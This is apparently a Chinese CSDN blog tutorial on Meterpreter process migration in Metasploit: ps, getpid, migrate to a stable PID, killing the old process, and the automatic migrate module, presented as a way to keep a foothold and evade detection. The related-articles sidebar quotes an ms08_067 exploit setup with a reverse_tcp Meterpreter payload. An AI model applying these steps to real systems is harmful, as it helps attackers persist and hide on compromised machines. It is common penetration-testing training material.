Metasploit(进程迁移)

最新推荐文章于 2023-08-16 19:53:45 发布
最新推荐文章于 2023-08-16 19:53:45 发布
阅读量6.6k 收藏 22
点赞数 4
分类专栏: Metasploit 文章标签: getpid migrate
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41453632/article/details/84726947
版权

进程迁移:

   在刚获得Meterpreter shell时,该shell是及其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动这个shell,把他和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。这样做使得渗透更难被检测到。

输入  ps 命令 (获取目标机正在运行的进程)

输入 getpid 命令(查看meterpreter shell的进程号)

找到一个相对稳定的应用记住他的pid ,然后将  meterpreter shell 的pid换成它的。

输入migrate 7240(将meterpreter shell的pid调到7240里相对稳定应用的进程里了,然后用getpid再次查看下是否更换成功)

如上图,表示pid进程已经迁移成功了,如果没有迁移成功,可以输入 kill 9968 命令“杀掉”进程,使用自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程进行迁移

 

 

 

毕竟话少
关注
  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
分布式系统中的进程迁移
盘山牛
11-02 4580
1 进程迁移的目的 分布式系统的特点之一是允许信息在系统中移动,但有的系统只允许数据(文件、数据库记录等)在系统中迁移,有的系统只允许还未开始执行的任务进行迁移,有的系统允许处于运行状态的任务进行迁移,最后一种情况被称为“进程迁移”。进程迁移是一种在松藕合的分布式系统中,将正在某处理机(源处理机)上运行的进程传送到另外的处理机(目的处理机)上,并使进程在目的机上从“断点”起继续运行的方法。在分布
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
Linux 进程替换
最新发布
NuYoaH502329的博客
08-16 565
先fork,使系统中多出一个进程,默认情况下,fork之后,父进程和子进程的代码都一样,子进程是父进程的一个副本,那么把整个副本替换掉, 不会影响父进程,这样就产生了一个全新的进程。这样做的原因是,fork有一个特点,它会把父进程的信息继承给子进程,然后exec进行替换的时候把需要的信息留下,不需要的信息替换掉就可以了,如果是直接创建一个进程,有些信息需要填充,不像复制把父进程的资源复制了一份给了子进程。所以可以得出结论,替换的是进程的实体,在替换之后pid是不发生变化的。替换之后,main程序就没有了。
进程迁移
√R.D
06-26 2959
进程迁移(Process Migration) 什么是进程迁移?  进程迁移就是将一个进程从当前位置移动到指定的处理器上。它的基本思想是在进程执行过程中移动它,使得它在另一个计算机上继续存取它的所有资源并继续运行,而且不必知道运行进程或任何与其它相互作用的进程的知识就可以启动进程迁移操作,这意味着迁移是透明的。 进程迁移的好处  进程迁移是支持负载平衡和高容错性的一种非常有
进程 线程 进程迁移
weixin_30824277的博客
08-02 401
进程 进程是系统中独立存在的实体,它可以拥有自己独立的资源,比如文件和设备描述符等。在没有经过进程本身允许的情况下,其它进程不能访问到这些资源。这一点上和线程有很大的不同。 进程与程序的区别在于,程序只是一个静态的指令集合,而进程是一个正在系统中活动的指令集合。 在进程中加入了时间的概念。进程具有自己的生命周期和各种不同的状态,这些概念在程序中都是不具备的。 若干个进程可以在单处理机状...
Metasploit技术(四)——进程迁移
Phantom03167的博客
04-11 4867
后渗透攻击 进程迁移
35. Metasploit后渗透攻击:Meterpreter进程迁移
__Qian的博客
03-17 3882
1. Meterpreter优势: a. 纯内存工作模式,不需要对磁盘进行任何写入操作; b. 使用加密通信协议,而且可以同时与几个信道通信; c. 在被攻击进程内工作,不需要创建新的进程; d. 易于在多进程之间迁移; e. 平台通用,适用于Windows、Linux、BSD系统,并支持Intel x86和Intel x64平台 2.Meterpreter进程迁移 在刚获得的Meterpre...
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
Metasploit.zip
08-11
Metasploit是一款强大的安全漏洞检测和利用工具,广泛应用于网络安全测试和评估中。它提供了丰富的模块,涵盖了漏洞扫描、漏洞验证、payload生成以及攻击执行等多个环节。本篇将详细介绍Metasploit的安装过程及其...
进程迁移在Linux操作系统环境中的实现
09-26
本文主要讨论了在L inux 操作系统中一个用 户作业进程的虚拟内存管理方法; 论述了在内核 中增加功能模块的方法; 在L inux 操作系统环境 中, 实现进程迁移的方法和手段。
基于进程迁移的地址空间复用和可信进程间通.pdf
07-05
基于进程迁移的地址空间复用和可信进程间通.pdf
Metasploit 中文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本 POC 指南的内容涉及智能入侵测定、密码审计、...
进程状态迁移
qq_40100414的博客
02-15 1026
目的 写一个程序描述进程状态迁移过程,理解进程概念、状态转换及其控制。 内容 1)提供导致进程状态变化的调用接口,包括创建、删除、调度、阻塞、时间到、挂起、激活等。 2)实现进程列表显示的接口。 3)这里设计的进程是一个假设的对象实体,是由程序自己创建和删除,不是系统维护的进程。 需求(需要实现哪些功能) 初始化进程基本数据; 向就绪队列添加进程,(考虑优先级); 从就绪队列中取进程; 将被阻塞的执行进程放入阻塞队列; 唤醒阻塞队列中的进程; ...
进程状态转移
weixin_30889885的博客
01-18 296
进程在其声明周期内,由于系统中各个进程之间的相互制约关系及系统的运行环境的变化,使得进程的状态也在不断发生变化,即一个进程会经历不同的状态 五种状态 1. 运行状态 进程在处理器上运行。在单处理器环境下,同一时刻只有一个进程在运行 2. 就绪状态 进程处于准备运行的状态。进程获得了除处理器之外的所有所需资源,只等分给时间片运行 3. 阻塞状态 进程等待某一事件而暂停运行。比...
metasploit迁移进程
天元喜羊羊的博客
04-27 3320
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
进程状态变迁
博可睿的博客
04-11 929
进程的几种状态
基于Linux 的进程迁移机制设计
seckilling的专栏
06-13 3522
基于Linux 的进程迁移机制设计 1  引言 进程迁移在集群和分布式系统中发挥着相当重要的作用。通过将进程从负载较重的系统移动到负载较轻的系统,负载就会得到平衡,从而改善整体性能。进程迁移的算法直接影响着进程迁移时间,目前流行的几种迁移算法有Total2Copy、Demand2Page 和File Server ,从表1 中我们可以看到,在以这些算法为基础的系统中,进程迁移时间都比较长,这影
写一个程序描述进程状态迁移过程
u011020012的专栏
10-03 2391
#include "stdio.h"            #include             #include             #define getpch(type) (type*)malloc(sizeof(type))            #define NULL 0            struct pcb { /* 定义进程控制块PCB 

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值